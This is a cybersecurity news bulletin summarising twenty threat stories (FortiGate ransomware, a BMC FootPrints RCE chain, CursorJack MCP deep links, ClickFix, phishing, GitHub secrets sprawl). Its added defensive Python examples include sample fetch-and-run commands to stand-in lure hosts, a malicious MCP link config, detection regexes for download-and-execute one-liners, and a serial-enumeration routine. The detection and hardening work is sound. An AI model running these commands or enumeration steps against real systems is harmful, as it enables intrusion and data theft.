ThreatsDay Bulletin: FortiGate RaaS, Citrix Exploits, MCP Abuse, LiveChat Phish & More

News Room
Last updated: 2026/03/19 at 10:53 AM
News Room Published 19 March 2026
Ravie Lakshmanan, Mar 19, 2026. Cybersecurity / Hacking News

ThreatsDay Bulletin is back on The Hacker News, and this week feels off in a familiar way. Nothing loud, nothing breaking everything at once. Just a lot of small things that shouldn’t work anymore but still do.

Some of it looks simple, almost sloppy, until you see how well it lands. Other bits feel a little too practical, like they’re already closer to real-world use than anyone wants to admit. And the background noise is getting louder again, the kind people usually ignore.

A few stories are clever in a bad way. Others are just frustratingly avoidable. Overall, it feels like quiet pressure is building in places that matter.

Skim it or read it properly, but don’t skip this one.

  1. Emerging RaaS exploiting FortiGate flaws

    Group-IB has shed light on the various tactics adopted by The Gentlemen, a nascent Ransomware-as-a-Service (RaaS) operation that consists of about 20 members. It originated from a payment dispute after its operator “hastalamuerte” opened a public arbitration thread on the RAMP cybercrime forum, accusing Qilin ransomware operators of unpaid affiliate commission amounting to $48,000. The group primarily uses CVE-2024-55591, a critical authentication bypass vulnerability in FortiOS/FortiProxy, for initial access. “The group maintains an operational database of approximately 14,700 already exploited FortiGate devices globally,” the company said. “Separate from exploited devices, the operators maintain 969 validated brute-forced FortiGate VPN credentials ready for attack.” The Gentlemen also employs defense evasion via the bring your own vulnerable driver (BYOVD) technique to terminate security processes at the kernel level. About 94 organizations have already been attacked by this threat group since its emergence in July/August 2025.

  2. Pre-auth RCE chain in ITSM platform

    Four security flaws (CVE-2025-71257, CVE-2025-71258, CVE-2025-71259, and CVE-2025-71260) have been disclosed in BMC FootPrints, a widely deployed ITSM solution, that could be chained into pre-authentication remote code execution. The attack sequence begins with an authentication bypass (CVE-2025-71257) that extracts a guest session token (“SEC_TOKEN”) from the password reset endpoint, which is then used to reach an unsanitized Java deserialization sink (CVE-2025-71260) in the “/aspnetconfig” endpoint’s “__VIEWSTATE” parameter. Exploitation via the AspectJWeaver gadget chain enables arbitrary file write to the Tomcat web root directory, achieving full remote code execution. Armed with the SEC_TOKEN, an attacker could also exploit two SSRF flaws (CVE-2025-71258 and CVE-2025-71259) and potentially leak internal data. The issues were addressed in September 2025.
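
The chain above hinges on a Java object being fed to a deserialization sink through an ASP.NET-style `__VIEWSTATE` parameter. A raw Java serialization stream always begins with the bytes `AC ED 00 05`, which base64-encode to the prefix `rO0AB`, so that header is a cheap, product-independent signal a WAF rule or log-review script can key on. The following Python is an added example written for this bulletin, not code from the FootPrints research or from BMC; the request bodies are constructed here (the "malicious" one carries only the stream header plus filler, not a gadget chain), and a real view state is assumed to be the ASP.NET LOS format, whose base64 form starts with `/wE`.

```python
import base64
import binascii
from typing import Optional
from urllib.parse import parse_qs, quote_plus

# Java serialization stream header: STREAM_MAGIC (0xACED) followed by STREAM_VERSION (5).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"


def decode_b64_param(value: str) -> Optional[bytes]:
    """Lenient base64 decode for a form value: restores '+' that parse_qs turned
    into spaces, accepts the URL-safe alphabet and tolerates missing padding."""
    s = value.strip().replace(" ", "+").replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=False)
    except (binascii.Error, ValueError):
        return None


def find_java_serialized_params(body: str, min_len: int = 8) -> list[str]:
    """Return the names of form parameters whose base64-decoded value begins with
    the Java serialization header, i.e. a raw ObjectInputStream payload. Only the
    header is checked, so this flags any Java object, benign or not."""
    hits: list[str] = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            if len(v) < min_len:
                continue
            raw = decode_b64_param(v)
            if raw is not None and raw.startswith(JAVA_STREAM_MAGIC):
                hits.append(name)
                break
    return hits


# Constructed sample bodies (not captured traffic). The "malicious" one carries the
# Java stream header plus filler bytes, not a working gadget chain.
_fake_stream = JAVA_STREAM_MAGIC + b"constructed-filler-bytes-not-a-gadget"
MALICIOUS_BODY = (
    "__VIEWSTATE=" + quote_plus(base64.b64encode(_fake_stream).decode()) + "&__EVENTTARGET="
)
# Assumption: a normal ASP.NET view state is an LOS blob whose base64 form starts with "/wE".
BENIGN_BODY = "__VIEWSTATE=%2FwEPDwUKMTIzNDU2Nzg5MGRk&__EVENTTARGET=&SEC_TOKEN=abc123"

if __name__ == "__main__":
    print("malicious:", find_java_serialized_params(MALICIOUS_BODY))  # ['__VIEWSTATE']
    print("benign:   ", find_java_serialized_params(BENIGN_BODY))     # []
```

Run the function over decoded POST bodies from a reverse-proxy log; any `__VIEWSTATE` (or other parameter) that decodes to a Java stream on a platform that is supposed to be handling ASP.NET-style state is worth an alert on its own, independent of which gadget chain follows the header.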

  3. Loader deploys stealthy C2 malware

    The malware loader known as Hijack Loader is being used to deliver a previously undocumented, C++-based command-and-control (C2) framework known as SnappyClient. “SnappyClient has an extended list of capabilities, including taking screenshots, keylogging, a remote terminal, and data theft from browsers, extensions, and other applications,” Zscaler ThreatLabz said. “SnappyClient employs multiple evasion techniques to hinder endpoint security detection, including an Antimalware Scan Interface (AMSI) bypass, as well as implementing Heaven’s Gate, direct system calls, and transacted hollowing. SnappyClient receives two configuration files from the C2 server, which contain a list of actions to perform when a specified condition is met, along with another that specifies applications to target for data theft.” The framework was first discovered in December 2025. The attack chain involves the distribution of malicious payloads after a user visits a website impersonating the Spanish telecom firm Telefónica. It’s assessed that the primary use for SnappyClient is cryptocurrency theft, with a possible connection between the developers of HijackLoader and SnappyClient based on observed code similarities.

  4. Deep link abuse enables command execution

    Proofpoint has detailed a new technique called CursorJack that abuses Cursor’s support for Model Context Protocol (MCP) deep links to enable local command execution or allow installation of a malicious remote MCP server. The attack takes advantage of the fact that MCP servers commonly specify a command in their “mcp.json” configuration. “The cursor:// protocol handler could be abused through social engineering in specific configurations,” the company said. “A single click followed by user acceptance of an install prompt could result in arbitrary command execution. The technique could be leveraged both for local code execution via the command parameter or to install a malicious remote MCP server via the URL parameter.” The enterprise security firm has also released a proof-of-concept (PoC) exploit on GitHub.
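
What makes the technique work is that an MCP server entry is either a local `command` (plus `args`) that the client executes, or a remote `url` the client connects to, and the deep link carries that entry for the user to accept. A pre-install policy check can therefore be written against the config itself rather than against any particular lure. The Python below is an added example for this bulletin, not Proofpoint's PoC or Cursor's code; it assumes the install link format documented for Cursor's "Add to Cursor" buttons (`cursor://anysphere.cursor-deeplink/mcp/install?name=...&config=<base64 JSON>`), an organisation allow-list of remote MCP hosts (`ALLOWED_REMOTE_HOSTS`, invented here), and constructs its own test links.

```python
import base64
import json
from urllib.parse import parse_qs, urlsplit

# Assumption: the MCP "install" deep-link format used by Cursor's "Add to Cursor" buttons,
# where config is one server entry as it would appear under "mcpServers" in mcp.json.
INSTALL_PATH = "anysphere.cursor-deeplink/mcp/install"

# Assumption: the organisation's allow-list of remote MCP hosts (invented for this example).
ALLOWED_REMOTE_HOSTS = {"mcp.example-corp.internal"}


def parse_mcp_install_link(link: str) -> dict:
    """Split the deep link and decode the base64 JSON server entry it carries."""
    parts = urlsplit(link)
    if parts.scheme != "cursor" or (parts.netloc + parts.path) != INSTALL_PATH:
        raise ValueError("not an MCP install deep link")
    qs = parse_qs(parts.query)
    raw = qs.get("config", [""])[0].replace(" ", "+").replace("-", "+").replace("_", "/")
    raw += "=" * (-len(raw) % 4)
    config = json.loads(base64.b64decode(raw))
    return {"name": qs.get("name", [""])[0], "config": config}


def evaluate_mcp_install_link(link: str) -> tuple[str, str]:
    """Return ("allow" | "block", reason) for a cursor:// MCP install link."""
    try:
        info = parse_mcp_install_link(link)
    except (ValueError, json.JSONDecodeError) as exc:
        return "block", f"unparseable link: {exc}"
    cfg = info["config"]
    if not isinstance(cfg, dict):
        return "block", "config is not an object"
    # Local servers: "command" (+ "args") runs on the workstation once the user accepts
    # the install prompt. This is the CursorJack local-execution path; block outright.
    if "command" in cfg:
        cmdline = " ".join([str(cfg["command"]), *map(str, cfg.get("args", []))])
        return "block", f"local command execution: {cmdline}"
    # Remote servers: "url" points the client at an endpoint that will feed tools and
    # prompts into the agent. Permit only HTTPS to allow-listed hosts.
    url = cfg.get("url")
    if isinstance(url, str):
        u = urlsplit(url)
        if u.scheme == "https" and u.hostname in ALLOWED_REMOTE_HOSTS:
            return "allow", f"remote MCP server on allow-listed host {u.hostname}"
        return "block", f"remote MCP server not on allow-list: {url}"
    return "block", "config has neither command nor url"


def make_install_link(name: str, config: dict) -> str:
    """Build a deep link in the assumed format (used here only to produce test inputs)."""
    b64 = base64.urlsafe_b64encode(json.dumps(config).encode()).decode().rstrip("=")
    return f"cursor://{INSTALL_PATH}?name={name}&config={b64}"


# Constructed links, not samples from the Proofpoint research.
LINK_LOCAL_CMD = make_install_link("helper", {"command": "sh", "args": ["-c", "id"]})
LINK_REMOTE_OK = make_install_link("corp", {"url": "https://mcp.example-corp.internal/sse"})
LINK_REMOTE_BAD = make_install_link("free-tools", {"url": "https://mcp.attacker.example/sse"})

if __name__ == "__main__":
    for link in (LINK_LOCAL_CMD, LINK_REMOTE_OK, LINK_REMOTE_BAD):
        print(evaluate_mcp_install_link(link))
```

The same evaluation can be applied to entries already present in a workstation's `mcp.json`, since the deep link is just a transport for one of those entries; the install-prompt click is the only thing standing between the link and the `command` being executed.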

  5. Mass exploitation hits Citrix flaws

    A new campaign is actively targeting known security flaws in Citrix NetScaler (CVE-2025-5777 and CVE-2023-4966). According to Defused Cyber, more than 500 exploit attempts have been recorded against its honeypot system on March 16, 2026. “Highly elevated exploit activity against older vulnerabilities can often precede a zero-day vulnerability,” it said.

  6. Teams phishing grants remote access

    Rapid7 said it’s seeing an increase in phishing campaigns where threat actors impersonate internal IT departments via Microsoft Teams. “The primary objective is to persuade users to launch Quick Assist, granting the TA remote access to deploy malware, exfiltrate data, or facilitate lateral movement across the network,” it added. “The recent surge in Teams-based delivery highlights a critical vulnerability in how organizations manage external access. Teams often allows any external user to message internal staff. This is the functional equivalent of operating an email server without a gateway filter.”

  7. ClickFix delivers AutoHotKey backdoor

    A new ClickFix-style campaign has compromised a Pakistani government website (“wasafaisalabad.gop[.]pk”) to serve fake CAPTCHA lures. The lure tricks the visitor into pasting and running a disguised clipboard command that launches an MSI installer, which in turn drops an AutoHotKey-based backdoor that polls a remote server for tasks, Gen Digital said. It’s currently not known how the website was breached. The social engineering tactic has proved so effective that even nation-state groups such as North Korea’s Lazarus group, Iran’s MuddyWater, and Russia’s APT28 have adopted it. In January, researchers from Sekoia reported that a separate ClickFix framework dubbed IClickFix had been injected into over 3,800 WordPress sites since 2024.
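
Because ClickFix depends on the victim pasting a one-liner into the Run dialog or a terminal, the detection opportunity is the process-creation event: an installer or interpreter spawned from `explorer.exe` with a remote URL on its command line, often with a trailing "I am not a robot" comment that the lure appends so the Run box looks harmless. The Python below is an added example for this bulletin, not Gen Digital's or Sekoia's detection logic; the events are constructed Sysmon-style records (fields `parent`, `image`, `cmdline`), and the regexes are the author's own shapes for the command families ClickFix lures commonly use.

```python
import re

# Regexes for the command shapes ClickFix lures paste into the Run dialog or a terminal.
# List order only determines the order of rule names in the output.
CLICKFIX_RULES = [
    ("msiexec_remote", re.compile(r"msiexec(\.exe)?\b.*?/(i|package)\s+[\"']?https?://", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+[\"']?https?://", re.I)),
    ("ps_hidden_download", re.compile(
        r"powershell.*?(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|\biwr\b|invoke-webrequest|downloadstring)",
        re.I)),
    ("curl_pipe_shell", re.compile(r"\b(curl|wget)\b.*?\|\s*(ba)?sh\b", re.I)),
    # Lures append a comment so the victim sees "I am not a robot" in the Run box.
    ("captcha_comment", re.compile(r"#\s*.*(not a robot|captcha|verification id)", re.I)),
]

# The Run dialog (Win+R) is hosted by explorer.exe, so that parent means "typed or pasted by a user".
RUN_DIALOG_PARENTS = {"explorer.exe"}


def match_clickfix(cmdline: str) -> list[str]:
    """Names of every rule whose pattern appears in the command line."""
    return [name for name, rx in CLICKFIX_RULES if rx.search(cmdline)]


def find_clickfix_events(events: list[dict]) -> list[dict]:
    """Run the rules over process-creation events; return one hit per matching event."""
    hits = []
    for i, ev in enumerate(events):
        rules = match_clickfix(ev.get("cmdline", ""))
        if rules:
            hits.append({
                "index": i,
                "image": ev.get("image"),
                "rules": rules,
                "via_run_dialog": ev.get("parent", "").lower() in RUN_DIALOG_PARENTS,
            })
    return hits


# Constructed events, not telemetry from the campaign. Two are malicious, two are routine admin.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i https://cdn.lure.example/update.msi /qn # I am not a robot - reCAPTCHA Verification ID: 7719"},
    {"parent": "services.exe", "image": "msiexec.exe",
     "cmdline": r"msiexec /i C:\Windows\Installer\1a2b3c.msi /qn"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://lure.example/a | iex"'},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for hit in find_clickfix_events(SAMPLE_EVENTS):
        print(hit)
```

In a SIEM the `via_run_dialog` flag is the useful discriminator: remote `msiexec` and hidden-window PowerShell do show up in legitimate software deployment, but almost never as children of `explorer.exe` with a comment on the end of the line.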

  8. Stealer upgrade spreads via pirated games

    The malware loader known as Hijack Loader is being used to deliver an updated version of an information stealer referred to as ACRStealer. “This updated variant follows similar evasion techniques and C2 initialization strategy to make it even stealthier,” G DATA said. “This integration with HijackLoader highlights ACRStealer’s versatility and modularity, which will likely attract more malicious actors to use it as a final payload.” In these campaigns, Hijack Loader is downloaded from the domain associated with PiviGames, a Spanish portal hosting pirated PC games. The development comes against the backdrop of another campaign that involved several cases of malware being distributed through PiviGames.

  9. Live chat phishing steals sensitive data

    A new phishing campaign has been observed using LiveChat, a customer service software featuring live messaging, to steal data. Phishing emails using refund-related themes are used to redirect users to a link hosted via LiveChat’s service (“direct.lc[.]chat”), from where they are asked to click on a link sent in the chat to complete the refund by entering their personal and financial information. “Unlike typical refund scams or credential phishing, this campaign engages victims through a real-time chat interface, impersonating well-known brands in order to harvest sensitive data such as account credentials, credit card details, multi-factor authentication (MFA) codes, and other personally identifiable information (PII),” Cofense said.

  10. RagaSerpent expands multi-region espionage

    A SideWinder-adjacent cluster known as RagaSerpent is suspected to be leveraging tax audit and government compliance themes in spear-phishing emails to deliver multi-stage malware for command-and-control (C2) and establish sustained access across targeted organizations in Southeast Asia, including Indonesia and Thailand. The attack chain is consistent with a prior campaign targeting India using similar tax-related lures to deliver a legitimate enterprise tool called SyncFuture TSM, developed by a Chinese company. “This is not unusual in APT operations: in-country targeting can be used to complicate attribution (e.g., by creating noisy ‘domestic’ victimology) or to reach foreign diplomats/missions operating inside India—a pattern explicitly noted in reporting on SideWinder’s broader geographic targeting and diplomatic victim set,” ITSEC Asia said. The recent campaigns show the threat actor has expanded its operations beyond South Asia and into Africa, Europe, the Middle East, and Southeast Asia.

  11. Unauthenticated access exposed device data

    DJI has patched a security flaw in its backend that could have allowed attackers to take over all of its Romo smart vacuums. Security researcher Sammy Azdoufal said DJI’s servers returned data for any device when given only its serial number, with no authentication or authorization. Using that, he was able to map the locations of more than 7,000 Romo smart vacuums and 3,000 DJI portable power stations served by the same backend.
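
The bug class here is an unauthenticated direct object reference: the serial is both the lookup key and, in effect, the credential. The fix is not to hide serials but to bind every lookup to an authenticated caller and an ownership check, and to answer "not yours" and "does not exist" identically so the endpoint cannot be used to enumerate which serials are live. The Python below is an added illustration written for this bulletin, not DJI's code or the researcher's script; the device registry and handler signatures are invented.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass(frozen=True)
class Device:
    serial: str
    owner_id: str
    lat: float
    lon: float


# Constructed registry standing in for the backend's device table.
DEVICES = {
    "ROMO-0001": Device("ROMO-0001", "user-a", 48.8566, 2.3522),
    "ROMO-0002": Device("ROMO-0002", "user-b", 51.5074, -0.1278),
    "PWR-0001": Device("PWR-0001", "user-a", 40.7128, -74.0060),
}


def device_status_vulnerable(serial: str) -> tuple[int, dict]:
    """The pattern described in the report: the serial alone selects the record,
    so anyone who can guess or enumerate serials gets any device's location."""
    dev = DEVICES.get(serial)
    if dev is None:
        return 404, {"error": "unknown device"}
    return 200, {"serial": dev.serial, "lat": dev.lat, "lon": dev.lon}


def device_status_hardened(serial: str, caller_id: Optional[str]) -> tuple[int, dict]:
    """Require an authenticated caller and check that the caller owns the device.
    Unknown and not-owned serials both return the same 404 so the endpoint cannot
    be used to confirm which serials exist."""
    if caller_id is None:
        return 401, {"error": "authentication required"}
    dev = DEVICES.get(serial)
    if dev is None or dev.owner_id != caller_id:
        return 404, {"error": "unknown device"}
    return 200, {"serial": dev.serial, "lat": dev.lat, "lon": dev.lon}


def enumerate_serials(prefix: str, count: int,
                      handler: Callable[[str], tuple[int, dict]]) -> dict[str, dict]:
    """What an attacker does against the vulnerable endpoint: walk a serial range and
    keep every hit. Against the hardened handler with no caller it collects nothing."""
    found = {}
    for n in range(1, count + 1):
        serial = f"{prefix}-{n:04d}"
        status, body = handler(serial)
        if status == 200:
            found[serial] = body
    return found


if __name__ == "__main__":
    print("vulnerable:", enumerate_serials("ROMO", 10, device_status_vulnerable))
    print("hardened:  ", enumerate_serials("ROMO", 10, lambda s: device_status_hardened(s, None)))
```

Rate limiting and unpredictable serials help, but neither is the fix; the ownership check is, and the uniform 404 keeps the fixed endpoint from leaking the device population the researcher was able to map.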

  12. New password layer strengthens account security

    WhatsApp has begun testing support for setting an alphanumeric account password. It can be between six and 20 characters long and must include at least one letter and one number. The extra password is likely intended to make account takeover harder: if a threat actor carries out a SIM swap to intercept the SMS verification code sent during registration, they would still need to enter the 6-20 character password to gain access to the victim’s WhatsApp account.

  13. Suspected ransomware group appears fabricated

    More evidence has emerged that the 0APT ransom group is likely a fake and a fraud. “Thus far, the threat actor has not provided credible proof of ransomware or data exfiltration attacks as the data samples on the DLS appeared to be fabricated,” Intel 471 said. “For example, the files that supposedly contained metadata of data stolen from victim networks were unusually large, reaching several terabytes each. Additionally, partial downloads of those files indicated they did not contain any useful data, and in fact, we observed several instances in which the content contained a repeating pattern of null bytes.”
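
Intel 471's tell is worth turning into a routine check, because a partial download is usually enough: a "leak" file that is multi-terabyte in size yet opens with nothing but null bytes or a short repeating pattern has no content to have been stolen. The Python below is an added example for this bulletin, not Intel 471's tooling; it scores the first bytes of a file by null ratio, repeating period and byte entropy. The samples are constructed (a null block, a four-byte repeating block, and a SHA-256-derived pseudo-random block standing in for the head of a real compressed archive), and the thresholds are assumptions for illustration.

```python
import hashlib
import math
from collections import Counter
from typing import Optional


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a single repeated value, about 8.0 for random data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def repeating_period(data: bytes, max_period: int = 64) -> Optional[int]:
    """Smallest p <= max_period such that data[i] == data[i - p] for all i, else None."""
    for p in range(1, min(max_period, len(data) - 1) + 1):
        if data[p:] == data[:-p]:
            return p
    return None


def assess_sample(head: bytes, claimed_size: int, size_sanity_limit: int = 1 << 40) -> dict:
    """Score a partial download (the first bytes of a purported leak file).
    Verdicts: 'fabricated' when the content is filler, 'suspicious' when only the
    claimed size is implausible, 'plausible' otherwise. Thresholds are assumptions."""
    n = len(head)
    null_ratio = head.count(0) / n if n else 1.0
    period = repeating_period(head)
    entropy = shannon_entropy(head)
    content_reasons = []
    if null_ratio >= 0.9:
        content_reasons.append(f"{null_ratio:.0%} null bytes")
    elif period is not None:
        content_reasons.append(f"content repeats every {period} byte(s)")
    size_reason = None
    if claimed_size > size_sanity_limit:
        size_reason = f"claimed size {claimed_size / (1 << 40):.1f} TiB is implausible for a file listing"
    if content_reasons:
        verdict = "fabricated"
    elif size_reason:
        verdict = "suspicious"
    else:
        verdict = "plausible"
    return {
        "verdict": verdict,
        "entropy": round(entropy, 2),
        "null_ratio": round(null_ratio, 3),
        "period": period,
        "reasons": content_reasons + ([size_reason] if size_reason else []),
    }


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy bytes (SHA-256 chain) so the example runs offline."""
    out, block = bytearray(), b"constructed-seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed samples, not material from the 0APT leak site.
NULL_SAMPLE = b"\x00" * 4096
PATTERN_SAMPLE = b"\xde\xad\xbe\xef" * 1024
REALISTIC_SAMPLE = _pseudo_random(4096)  # stands in for the head of a real compressed archive

if __name__ == "__main__":
    print(assess_sample(NULL_SAMPLE, 3 * (1 << 40)))
    print(assess_sample(PATTERN_SAMPLE, 2 * (1 << 40)))
    print(assess_sample(REALISTIC_SAMPLE, 50 * (1 << 20)))
```

A "plausible" verdict only means the head is not trivially fake; encrypted or compressed filler would also score high on entropy, so this is a first filter before any manual review of the claimed victim data, not proof of a breach.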

  14. Google blocks millions of risky apps

    Google rejected 1.75 million policy-violating Android apps and blocked more than 80,000 developer accounts from the Google Play Store in 2025, down from 2.36 million apps and 158,000 accounts in 2024. The company said that through 2025, it blocked more than 255,000 Android apps from obtaining excessive access to sensitive user data, and that it implemented more than 10,000 safety checks on published apps and strengthened detection capabilities by integrating Google’s latest generative artificial intelligence (AI) models into the review process. Android’s built-in security suite, Play Protect, which now scans over 350 billion apps every day, has identified over 27 million malicious apps sideloaded from outside Google Play. Play Protect’s ‘enhanced fraud protection’ has been expanded to cover over 2.8 billion Android devices in 185 markets, blocking 266 million installation attempts from 872,000 unique risky apps. In a related development, the tech giant has made available Scam Detection for phone calls on Google Pixel devices in the U.S., U.K., Australia, Canada, France, Germany, India, Ireland, Italy, Japan, Mexico, and Spain. It’s also being expanded to Samsung Galaxy S26 series in the U.S.

  15. 1% of flaws drove most attacks

    A report from VulnCheck found that a mere 1% of 2025 CVEs were exploited in the wild by the end of the year. Network edge devices accounted for a third of all products exploited last year. “There was a small decrease (-13%) in new vulnerabilities linked to named state-sponsored threat groups and APTs over the course of 2025,” the cybersecurity company said. “New CVE exploits attributed to China-nexus groups increased while Iranian exploit activity fell.” Another report from IBM X-Force revealed that there has been a 44% increase in cyberattacks exploiting public-facing applications.

  16. EU extends CSAM detection rules

    The European Parliament has voted to extend a temporary exemption to E.U. privacy legislation that allows online platforms to voluntarily detect child sexual abuse material (CSAM) until August 2027. Lawmakers said the additional time will allow the bloc to negotiate and adopt a long-term legal framework to prevent and combat CSAM online.

  17. AOT malware evades analysis and detection

    A previously undocumented attack chain delivered via a phishing URL has been found to distribute a ZIP archive containing a C++ trojan downloader, which then initiates a loader responsible for decrypting and staging the Rhadamanthys stealer and XMRig cryptocurrency miner. “The campaign’s core evasion relies on .NET Native Ahead-of-Time (AOT) compiled binaries, which strip traditional .NET metadata, frustrate common .NET analysis tools, and force analysts to fall back on native-level tooling, making detection and reverse engineering significantly harder,” Cyderes said. “Sophisticated anti-analysis capabilities: The AOT loader employs a sandbox scoring system evaluating RAM size, system uptime, user file counts, and AV process presence; virtual machine detection via registry inspection; and active suppression of miner activity when monitoring tools like Task Manager, Process Hacker, or x64dbg are detected.”

  18. Secrets sprawl surges across GitHub

    GitGuardian’s State of Secrets Sprawl report has found that 28,649,024 new secrets were added to public GitHub commits in 2025 alone, up 34% from the previous year. The figure also represents a 152% increase in leaked secrets growth since 2021. In 2025, AI service secrets reached 1,275,105, up 81% year-over-year. Also identified by GitGuardian were 24,008 unique secrets exposed in MCP-related configuration files across public GitHub, including 2,117 unique valid credentials.
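
The MCP finding is the one most teams can act on immediately, because an `mcp.json` puts credentials exactly where they are easiest to leak: in the `env` block of a local server entry or the `headers` of a remote one, committed alongside the rest of a project. The Python below is an added example for this bulletin, not GitGuardian's scanner; it walks an mcp.json-style document, flags values that match a few well-known credential shapes, and flags literal values under secret-looking key names while ignoring `${VAR}` placeholders. The sample config is constructed (the AWS values are Amazon's published documentation examples, not live keys), and no validation of found credentials is attempted.

```python
import json
import re

# Value-shape rules for well-known credential formats (a small subset; each is a documented prefix).
VALUE_RULES = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github_token", re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b")),
    ("slack_token", re.compile(r"\bxox[baprs]-[A-Za-z0-9-]{10,}")),
    ("openai_style_key", re.compile(r"\bsk-[A-Za-z0-9_-]{20,}")),
    ("private_key_block", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
]
# Key names that usually hold a credential; flagged only when the value is a literal.
SECRET_KEY_NAME = re.compile(r"(token|secret|passw(or)?d|api[_-]?key|access[_-]?key|authorization)", re.I)
# Placeholders that mean "resolved at runtime", which is what a committed mcp.json should contain.
PLACEHOLDER = re.compile(r"\$\{[^}]*\}|\$[A-Z_][A-Z0-9_]*|<[^>]+>|^\s*$")


def _redact(value: str) -> str:
    return value[:4] + "****" if len(value) > 8 else "****"


def scan_mcp_config(node, path: str = "", key: str = "") -> list[dict]:
    """Walk an mcp.json-style document (dicts, lists, strings) and report literal
    credentials wherever they sit: env, headers, args, url, anything."""
    findings: list[dict] = []
    if isinstance(node, dict):
        for k, v in node.items():
            findings += scan_mcp_config(v, f"{path}.{k}" if path else k, k)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            findings += scan_mcp_config(v, f"{path}[{i}]", key)
    elif isinstance(node, str):
        for rule, rx in VALUE_RULES:
            if rx.search(node):
                findings.append({"path": path, "rule": rule, "value": _redact(node)})
                return findings
        if SECRET_KEY_NAME.search(key) and not PLACEHOLDER.search(node) and len(node) >= 8:
            findings.append({"path": path, "rule": "literal_in_secret_named_key", "value": _redact(node)})
    return findings


def scan_mcp_file(filename: str) -> list[dict]:
    """Convenience wrapper for a real mcp.json on disk."""
    with open(filename, "r", encoding="utf-8") as fh:
        return scan_mcp_config(json.load(fh))


# Constructed mcp.json content (parsed form). Server/package names are invented;
# the AWS values are Amazon's documentation example credentials, not live keys.
SAMPLE_MCP_JSON = {
    "mcpServers": {
        "github": {
            "command": "npx",
            "args": ["-y", "some-github-mcp-server"],
            "env": {"GITHUB_PERSONAL_ACCESS_TOKEN": "ghp_" + "A" * 36},
        },
        "remote-corp": {
            "url": "https://mcp.example-corp.internal/sse",
            "headers": {"Authorization": "Bearer ${MCP_TOKEN}"},
        },
        "aws": {
            "command": "uvx",
            "args": ["some-aws-mcp-server", "--region", "eu-west-1"],
            "env": {
                "AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE",
                "AWS_SECRET_ACCESS_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
            },
        },
    }
}

if __name__ == "__main__":
    for finding in scan_mcp_config(SAMPLE_MCP_JSON):
        print(finding)
```

Wiring this into a pre-commit hook for any file named `mcp.json` (or `.cursor/mcp.json`, `claude_desktop_config.json` and similar) catches the case GitGuardian counted before it reaches a public commit; the `${VAR}` convention is what the committed file should contain, with the real value supplied from the developer's environment.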

  19. Malicious themes inject ads and redirects

    Six malicious Packagist packages posing as OphimCMS themes have been found to contain trojanized jQuery that exfiltrates URLs, injects full-screen overlay ads, and loads Funnull-linked redirects. The packages are ophimcms/theme-dy, ophimcms/theme-mtyy, ophimcms/theme-rrdyw, ophimcms/theme-pcc, ophimcms/theme-motchill, and ophimcms/theme-legend. “All six ship trojanized JavaScript assets, primarily disguised as legitimate jQuery libraries, that redirect visitors, exfiltrate URLs, inject ads, and in the most severe case load a second-stage payload – a mobile-targeted redirect to gambling and adult content sites, from infrastructure operated by Funnull,” Socket said.

  20. Multi-stage phishing bypasses security filters

    A C-level executive at Swedish security firm Outpost24 was targeted in a sophisticated phishing attack. The multi-chain redirect campaign impersonated JPMorgan Chase and asked the recipient to “review a document” by clicking a link, which starts the infection chain. The link is a redirect URL hosted within Cisco’s infrastructure, which then initiates a series of URL redirects that leverage trusted services like Nylas as well as compromised legitimate infrastructure to bypass security filters and conceal the final phishing destination. “Several stages redirect victims through legitimate or previously reputable domains, reducing the likelihood that security scanners or reputation-based filtering will block the link,” Specops said. “The attackers went as far as to implement a legitimate Cloudflare-based ‘human validation’ step to ensure that only real people saw the actual landing page where credentials are requested.” The attack, ultimately unsuccessful, is said to have used a new phishing-as-a-service (PhaaS) toolkit named Kratos.

Some of this will fade by next week. Some of it won’t. That’s the annoying part, figuring out which “minor” thing quietly sticks around and turns into a real problem later.

Anyway, that’s the rundown. Take what you need, ignore what you can, and keep an eye on the stuff that feels a little too easy.
